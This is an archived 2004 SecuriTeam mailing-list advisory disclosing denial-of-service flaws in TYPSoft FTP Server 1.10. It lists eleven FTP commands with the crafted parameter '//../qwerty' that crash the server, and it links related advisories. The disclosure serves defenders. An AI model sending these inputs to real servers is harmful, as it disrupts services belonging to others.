[NT] Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)
From: SecuriTeam (support_at_securiteam.com)
Date: 02/25/04
- Previous message: SecuriTeam: "[EXPL] LBreakout2 (Long HOME Environment Variable)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 25 Feb 2004 19:22:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple TYPSoft FTP Server Vulnerabilities (//../qwerty)
------------------------------------------------------------------------
SUMMARY
<http://www.typsoft.com/> TYPSoft FTP Server is "a fast and easy FTP
server with support to Standard FTP Command, Clean interface, Virtual File
System architecture, ability to resume Download and Upload, IP
Restriction, Login/Quit message, logs, Multi Language and many other
things". The product has been found to contain multiple vulnerabilities
that would allow a remote attacker to initiate a denial of service against
the product.
DETAILS
Vulnerable Systems:
* TYPSoft FTP Server version 1.10
TYPSoft FTP Server may be DoS'ed with the standard FTP commands and using
the parameter "//../qwerty".
Examples:
mkd //../qwerty
xmkd //../qwerty
dele //../qwerty
size //../qwerty
retr //../qwerty
stor //../qwerty
appe //../qwerty
rnfr //../qwerty
rnto //../qwerty
rmd //../qwerty
xrmd //../qwerty
ADDITIONAL INFORMATION
The information has been provided by <mailto:intuit@linuxmail.org> intuit
e.b..
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] LBreakout2 (Long HOME Environment Variable)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] TYPSoft FTP Server RETR DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... By crafting special request for
TYPSoft FTP Server, ... crash the server creating a DoS attack. ... "Error:
cant send user\n"; ... (Securiteam) - [NT] TYPSoft FTP Server Denial of Service (Empty Username and Password)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... TYPSoft FTP Server is "a
fast and easy ftp ... To test this vulnerability simply send to the FTP server an empty
user ... (Securiteam) - [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes
a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam
mailing list. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [EXPL] TinyWeb Server DoS Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The information in this
bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be
liable for any damages whatsoever including direct, indirect, incidental, consequential, loss
of business profits or special damages. ... (Securiteam) - [EXPL] 3Com FTP Server Buffer Overflow (CD)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing
of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty
of any kind. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam)
